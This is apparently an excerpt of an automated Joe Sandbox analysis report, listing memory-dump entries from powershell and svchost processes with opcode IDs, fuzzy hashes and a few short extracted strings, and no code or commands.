                                                                                                      • Source File: 0000000B.00000002.2295241854.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_11_2_7ffd9a3b0000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: O_^$O_^$O_^$O_^
                                                                                                      • API String ID: 0-934926442
                                                                                                      • Opcode ID: 6bdf0962e57c18d9a894e9fa151da6eda224e24c1c2185134776f53fccb41351
                                                                                                      • Instruction ID: af01b627f9351c0ad2193756e326057c716e40a11d44f42d9d76287ee2fd8170
                                                                                                      • Opcode Fuzzy Hash: 6bdf0962e57c18d9a894e9fa151da6eda224e24c1c2185134776f53fccb41351
                                                                                                      • Instruction Fuzzy Hash: 00017C93E0D6C28EE72756B848780642F919FD3364B2E14FFD0EE4F1A3E858241AC742
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 13f50f07056fa34564b849f017b7b6b4a0be81bcb98896833f206585f288ad67
                                                                                                      • Instruction ID: 1295718ab22f03d3adafe5bc5eea41d5d56d33f197585fb31f892e9dc4dd1664
                                                                                                      • Opcode Fuzzy Hash: 13f50f07056fa34564b849f017b7b6b4a0be81bcb98896833f206585f288ad67
                                                                                                      • Instruction Fuzzy Hash: AF32BA61F28A594FE798FB7884796B977D2FF98300B44057EE01EC32D6DE28A8418781
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <P_^
                                                                                                      • API String ID: 0-1190497245
                                                                                                      • Opcode ID: ee4f87b8e1970a726d958b4c52d89dfce05a968516586b21495eb456527d425c
                                                                                                      • Instruction ID: bd2ae160f95b16c668508cc928db4454ece1b0978835751040a5b9a3b072f482
                                                                                                      • Opcode Fuzzy Hash: ee4f87b8e1970a726d958b4c52d89dfce05a968516586b21495eb456527d425c
                                                                                                      • Instruction Fuzzy Hash: D941CEB6BA910A4FD304EF6CA8759E93FA1AB882147884072D40CC73DECD30B90687D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 60552f4269a925d7ab81e72dd86248870588fbd637b0483df54d2ec8b7a22812
                                                                                                      • Instruction ID: a6ae4e561402d3dbdbb8ccf8ef18c6e415b0443dac3bd8049d4d52daad255770
                                                                                                      • Opcode Fuzzy Hash: 60552f4269a925d7ab81e72dd86248870588fbd637b0483df54d2ec8b7a22812
                                                                                                      • Instruction Fuzzy Hash: EF414262E1E3924FD716BBB868724E57F609F42228B0D01F7D0DCCB0E7D819645A83A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 656a511af22c7bc7fa6276ff08096c0017c6a174443bdac0effc7c26c2ea64ca
                                                                                                      • Instruction ID: 729d1e4d54ff82cd5f95398d2df5c043e7ad96799f289a670bbbc4c0b3cda1b7
                                                                                                      • Opcode Fuzzy Hash: 656a511af22c7bc7fa6276ff08096c0017c6a174443bdac0effc7c26c2ea64ca
                                                                                                      • Instruction Fuzzy Hash: BB610622B1EAC61FE76AA7B868255797FD2EF8721070900FFD488CB1D7DD186C428352
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 258f1e5a06612896c387095dfa2fb0f807e4624e127832af8ff4e248a3a0e1aa
                                                                                                      • Instruction ID: 7477f3061cf546bf8c479d7442d380ad30902b0ac082f81d31679ba2540ea343
                                                                                                      • Opcode Fuzzy Hash: 258f1e5a06612896c387095dfa2fb0f807e4624e127832af8ff4e248a3a0e1aa
                                                                                                      • Instruction Fuzzy Hash: 07510311B1D6C90FD79AABB85874675BBD2DF8A215B0801FFE09DC71D7DE185806C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7636627dd0408bc701fdccd76cad756578b5b61f3bc69bf620af484a9e4e49aa
                                                                                                      • Instruction ID: 1b27e56c7ac9f82c1e53d827676a844b405fb5e9e54b0713ad4d75c77626ba5e
                                                                                                      • Opcode Fuzzy Hash: 7636627dd0408bc701fdccd76cad756578b5b61f3bc69bf620af484a9e4e49aa
                                                                                                      • Instruction Fuzzy Hash: 71518667E1E6911EE316BBB87C625E93F508F8227870C41F7D19C8F0EB9818145D87E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 44089376af93a9c42a31a05a62d64cee510066fe0943d59c6ba0c706d86b17b8
                                                                                                      • Instruction ID: 82c2ac873dc7c788786364424116ca08ed09ef34f243673def96b888e401d1c5
                                                                                                      • Opcode Fuzzy Hash: 44089376af93a9c42a31a05a62d64cee510066fe0943d59c6ba0c706d86b17b8
                                                                                                      • Instruction Fuzzy Hash: 56414153E1F6911EE316BBB87C325E93F648F8222870C41F7D19CCB0EB9808245D82E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e446db9c6f871f9f26328babef26ae92af871bbbe82455e821c5b47be28370a2
                                                                                                      • Instruction ID: baf4b3f236508052f845de300c6a8be2771a0c0ae1e840044ce10f2bdcf18733
                                                                                                      • Opcode Fuzzy Hash: e446db9c6f871f9f26328babef26ae92af871bbbe82455e821c5b47be28370a2
                                                                                                      • Instruction Fuzzy Hash: 33319521F189490FE798AB6C9869779B6C2EB9D314F0505BEE45EC32D7DE18AC428341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 23247df94cc22e084495845c018fcf3f0ed92872bac7744954c74cf4e398d8f9
                                                                                                      • Instruction ID: 1bddea3122eb24eacc7a1151607783412089911ebbe8598a4e3815821ae81980
                                                                                                      • Opcode Fuzzy Hash: 23247df94cc22e084495845c018fcf3f0ed92872bac7744954c74cf4e398d8f9
                                                                                                      • Instruction Fuzzy Hash: 4E31CB51F189094FE784BBB8486A7BC77D2EF99301F0401BBE41DC31D7DE28A8414382
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d4ef525e4e40b3ae512b14b54fb10fe77bf9b0cfdcc72bb3ea08dcae62faaa33
                                                                                                      • Instruction ID: dfe13a76e04c0d03f4b3e359f973acbbd13d1913549830658490aecb726dbae6
                                                                                                      • Opcode Fuzzy Hash: d4ef525e4e40b3ae512b14b54fb10fe77bf9b0cfdcc72bb3ea08dcae62faaa33
                                                                                                      • Instruction Fuzzy Hash: AE318071F289098FDB44EFA8C865AFD7BA2FF98304F544579D019D72CADE38A8418781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0c9f427b11e479add63e22ae66776b2abea5f4875f9c135cdb354978e70dde1e
                                                                                                      • Instruction ID: a46bc063be414d6d0d57f771c2c39b3e0fa4bf0cb18f8b87f546bd401787caea
                                                                                                      • Opcode Fuzzy Hash: 0c9f427b11e479add63e22ae66776b2abea5f4875f9c135cdb354978e70dde1e
                                                                                                      • Instruction Fuzzy Hash: 5541E9B2B696494FD358EF6898B59E97F71AF88204B8844A6D01DC73DECD34B900C7C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 06a56ae255d35a47d53f2c0f6c8869e40d28dde652e182cd7b74a2b55ec8e269
                                                                                                      • Instruction ID: 2108d4c70e6afe051168ad9bd8ef70162b2a2b2139ee17c75c65b3cf4fe777fd
                                                                                                      • Opcode Fuzzy Hash: 06a56ae255d35a47d53f2c0f6c8869e40d28dde652e182cd7b74a2b55ec8e269
                                                                                                      • Instruction Fuzzy Hash: 85111273F5440A4FDB58EFD8D8655FD77B2EF94240B94017BD119EB2E5CE2429424780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ea426f5372789f3592939a4ed124ac75e39cd496f2a13551ccb9b5acaad95f9
                                                                                                      • Instruction ID: 91ae9b03b98587ae81cbc982c8864164eb019a7ad9c90617f3a9e2ee1b792e96
                                                                                                      • Opcode Fuzzy Hash: 4ea426f5372789f3592939a4ed124ac75e39cd496f2a13551ccb9b5acaad95f9
                                                                                                      • Instruction Fuzzy Hash: EE014C12B1C2C54FE399BBF85C758753FA1CF82250B0C05FBE888C60E7DC0869418392
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0325a1b749e45559211dc9be67756904221d4f9227988068c994b5f985a8ae00
                                                                                                      • Instruction ID: 4e30fb3e8678b585bec2fee608a480ac0f925eae89c27522dc291f3324769963
                                                                                                      • Opcode Fuzzy Hash: 0325a1b749e45559211dc9be67756904221d4f9227988068c994b5f985a8ae00
                                                                                                      • Instruction Fuzzy Hash: 5CE0223390C6C44FD389DB5498252B1FBE0EF82220B0D46EBD098C71A2C66D49528381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a3f4249222d22a7f9d1c2e96b8a8265335ec7c943cc2a22ca9f1b64582a0d8ef
                                                                                                      • Instruction ID: 200fe534edf49d62d88f6472d073d73164d109469bab1ecc58ded550df6d787d
                                                                                                      • Opcode Fuzzy Hash: a3f4249222d22a7f9d1c2e96b8a8265335ec7c943cc2a22ca9f1b64582a0d8ef
                                                                                                      • Instruction Fuzzy Hash: 06D02E33A08D090BE2ACAA48A0162B0F3C0EB943A4B2800AFE418D32A8C9A618424280
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000D.00000002.2455916157.00007FFD9A3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3B0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_13_2_7ffd9a3b0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: =P_^$P_^^$P_^h$P_^j$P_^|$P_^~
                                                                                                      • API String ID: 0-43531156
                                                                                                      • Opcode ID: a7750e83b9585273ca929aadc0137a1e80d4d7f13743aeb283d44b5c30e7108d
                                                                                                      • Instruction ID: 727e0f1273beee0abf79e23e34d98c61cf5c3e5a62d05d52ba98403895a122ae
                                                                                                      • Opcode Fuzzy Hash: a7750e83b9585273ca929aadc0137a1e80d4d7f13743aeb283d44b5c30e7108d
                                                                                                      • Instruction Fuzzy Hash: 8831D3E7B190161AE3117BFD7892AEC234A9F8076878D0637D0EC8B0CF8918244A45D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8b804feb524adf46663ddb78687302424547b9441a91aeeae8367adf332022e9
                                                                                                      • Instruction ID: 9a35aec49dded8273116c992cbe1ad3aaadeacaa1c57496b24c278268fad506c
                                                                                                      • Opcode Fuzzy Hash: 8b804feb524adf46663ddb78687302424547b9441a91aeeae8367adf332022e9
                                                                                                      • Instruction Fuzzy Hash: 0532E961F29A094FE798FB7884796B977D2FF98301B5405BDE00EC32D6DE28AC418781
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: <M_^
                                                                                                      • API String ID: 0-1376500734
                                                                                                      • Opcode ID: 1a86a2666867344a9a18027843491713a4f896fd88c06e01a7edee2a0ddbdb20
                                                                                                      • Instruction ID: 8395096bf329ba16169d91a8e86b25491ce8483df4937db7d5ccd9f76102329f
                                                                                                      • Opcode Fuzzy Hash: 1a86a2666867344a9a18027843491713a4f896fd88c06e01a7edee2a0ddbdb20
                                                                                                      • Instruction Fuzzy Hash: D14105A2FAA54D4FD308AF6C98758E97F61AB942047884576D41AC33DFDE24A801C7D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e52f56e5f75f739ca9d4b4bbe27a7428c199d1909c79e1e056729401a0e09b5a
                                                                                                      • Instruction ID: 019a87eb017f809063a2d2afc55feba479e24d0256c186d697c2720e47a3655a
                                                                                                      • Opcode Fuzzy Hash: e52f56e5f75f739ca9d4b4bbe27a7428c199d1909c79e1e056729401a0e09b5a
                                                                                                      • Instruction Fuzzy Hash: 4A419023A1E7964FD756ABB868710E57FB0DF9322870D02F7D0D8CA0E7D819584A8396
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 274e8dd87f7eb95c7df97eeb122a24be3d97de23c681a4df569de3385d092db3
                                                                                                      • Instruction ID: c12a979700a21b7bace7cde6717666cce366cc53f1f08739c357045f679f18fe
                                                                                                      • Opcode Fuzzy Hash: 274e8dd87f7eb95c7df97eeb122a24be3d97de23c681a4df569de3385d092db3
                                                                                                      • Instruction Fuzzy Hash: 0E612622B4EACA1FE76AA7B868255797FD1EF8721071900FFD488C71D7CD186C428352
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 526b9b24a5ddfca8b9883d36b79dbd8799f8542219c76664398727d879db4df1
                                                                                                      • Instruction ID: 2cad77b6304ab05bef781ab720087fbf57be3b66256667924cb40fc200d08c8a
                                                                                                      • Opcode Fuzzy Hash: 526b9b24a5ddfca8b9883d36b79dbd8799f8542219c76664398727d879db4df1
                                                                                                      • Instruction Fuzzy Hash: 5C510221B1D6C90FDB9AABB85875675BBD1DF8A224B1800FEE09DC71D7DE185C06C342
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 636d51c6be22001116793f56fb68228d290d1332bc38390e6f871f60f57feef5
                                                                                                      • Instruction ID: c836ff4331a23b18d2b96ebf00a5e4ce27115d76c5c268fadac5027aa7be0286
                                                                                                      • Opcode Fuzzy Hash: 636d51c6be22001116793f56fb68228d290d1332bc38390e6f871f60f57feef5
                                                                                                      • Instruction Fuzzy Hash: 3C518157E1F6A54FD3167BB878625E97F60CF8227970C02F7D19C8A0EB8C19144983E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b3b6f88c12b31a9684e7d670370a983e52ebd8f7d83986312bec78d36279ec71
                                                                                                      • Instruction ID: ef4d72549c3ef64423ab63009c94eec93057aa91c3cc6aad90187427e0fed8b4
                                                                                                      • Opcode Fuzzy Hash: b3b6f88c12b31a9684e7d670370a983e52ebd8f7d83986312bec78d36279ec71
                                                                                                      • Instruction Fuzzy Hash: 6D418157E1F6A50BE3167BB878325E57F608F9223971C02FBD19C8A0DB8C09184D83E6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b5d4a14a7a9f7e811d7f95a7eee72ad20fbc478f71eb778d79960b5024d866da
                                                                                                      • Instruction ID: 464086ee40317da40b1629d33ccf4515474bf1573a499897310bbc25b82c8e7e
                                                                                                      • Opcode Fuzzy Hash: b5d4a14a7a9f7e811d7f95a7eee72ad20fbc478f71eb778d79960b5024d866da
                                                                                                      • Instruction Fuzzy Hash: FF31B621F189490FEB98BB6C9869779B7C2EB99314F0405BEE05EC32D7DE58AC428341
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d72ae8b028412dd12b823de0623dee33fd18e7fc8626b7b299e3854d845481bb
                                                                                                      • Instruction ID: 7b05696562b08c3d3653c4f66c9a4a8e3ed767070c22464da1265912835a19fe
                                                                                                      • Opcode Fuzzy Hash: d72ae8b028412dd12b823de0623dee33fd18e7fc8626b7b299e3854d845481bb
                                                                                                      • Instruction Fuzzy Hash: D331DD61F189094FEB84BBB8586A7BD77D1EF99301F1401BAE41DC32D7DE2CA8018392
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3f2dd9e98afad4856b7070cbed170eea57555cf4d806bd330b1a16ef447692c4
                                                                                                      • Instruction ID: a31e89e6cabfb6385aa138a6a5523f45a14e22934b2408a6f08dc4212b488f30
                                                                                                      • Opcode Fuzzy Hash: 3f2dd9e98afad4856b7070cbed170eea57555cf4d806bd330b1a16ef447692c4
                                                                                                      • Instruction Fuzzy Hash: 31319171F2890D9FDB44EFA888656BDBBA1FF98300F544579D01AD328ADE38A801C781
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 72730d1da4e4fd1508ac055e83069bf6294fc6d42ad083d89e9e0b5b031a29d8
                                                                                                      • Instruction ID: 8da78ac38172abc0bdaebc9315c8c4430f177e38cff116488896b4a59e3c24d0
                                                                                                      • Opcode Fuzzy Hash: 72730d1da4e4fd1508ac055e83069bf6294fc6d42ad083d89e9e0b5b031a29d8
                                                                                                      • Instruction Fuzzy Hash: 4D110063F1440A4BDB58EF98DC655FDB7B1EFA4200B94027AD11AE72E6CE342C428780
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4f61ed8694e7acaa62c1ddd2a1f1a39c9b7204f6b17d258d0e6c614db8d1a3da
                                                                                                      • Instruction ID: ecb3213831db29491cc46e1a05396648d3d1c92f04d67b3c0fad634b18681cc6
                                                                                                      • Opcode Fuzzy Hash: 4f61ed8694e7acaa62c1ddd2a1f1a39c9b7204f6b17d258d0e6c614db8d1a3da
                                                                                                      • Instruction Fuzzy Hash: 0B012812B1C2C54FE79ABBB818359753FA0CF81250B1804FBE888C60DBDD086A418392
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: cbdd4d77fd0ffbc004b74c247aea111f3111def2d7e89132a718e4ad0b2f6ec4
                                                                                                      • Instruction ID: 4bad364dedb4a768fc5d8bee51ee0db63f0e87cd7b1028c3dfbb306bf5940d42
                                                                                                      • Opcode Fuzzy Hash: cbdd4d77fd0ffbc004b74c247aea111f3111def2d7e89132a718e4ad0b2f6ec4
                                                                                                      • Instruction Fuzzy Hash: E4E0223390CA944FD389DB549825271BBE0EF92220B0D42EBC099C71A2C76D09428381
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: d625cb09de28d678adc7b6ae175e491f98d1ce6bb65facf15cbe94279b2ca615
                                                                                                      • Instruction ID: 9eff09851bf591a77d92cf0f1350bacda3abb1da20e15d66745378660e8443b1
                                                                                                      • Opcode Fuzzy Hash: d625cb09de28d678adc7b6ae175e491f98d1ce6bb65facf15cbe94279b2ca615
                                                                                                      • Instruction Fuzzy Hash: B8D02E33A08E190BE3ACEA48A000274F3D0EFA42A0B2801AFD41AD32A4C9A61C4282C0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.2538672285.00007FFD9A3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_7ffd9a3e0000_svchost.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: =M_^$M_^^$M_^h$M_^j$M_^|$M_^~
                                                                                                      • API String ID: 0-1553104472
                                                                                                      • Opcode ID: 2e0e7008a7b0ad65e64e3d2650f7f347bb5d039117d2750577f851d7af0e8b27
